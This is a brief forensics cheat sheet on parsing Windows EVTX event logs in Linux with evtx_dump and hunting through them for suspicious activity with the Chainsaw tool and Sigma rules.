Windows XML EventLog (EVTX)
EVTX is used for Microsoft Windows to store system log information.
Read EVTX in Linux
We can parse .evtx
file in Linux using evtx_dump.
wget https://github.com/omerbenamram/evtx/releases/download/v0.8.1/evtx_dump-v0.8.1-x86_64-unknown-linux-gnu -O evtx_dump
chmod +x evtx_dump
./evtx_dump example.evtx > parsed.txt
Now we can find sensitive information from the parsed text.
Search Suspicious Activity in EVTX
Chainsaw is a command-line tool to rapidly search and hunt through Windows Forensics Artifacts.
git clone https://github.com/WithSecureLabs/chainsaw.git
cd chainsaw
cargo build --release
./chainsaw hunt evtx_files/ -s sigma/rules --mapping mapping/sigma-event-logs-all.yml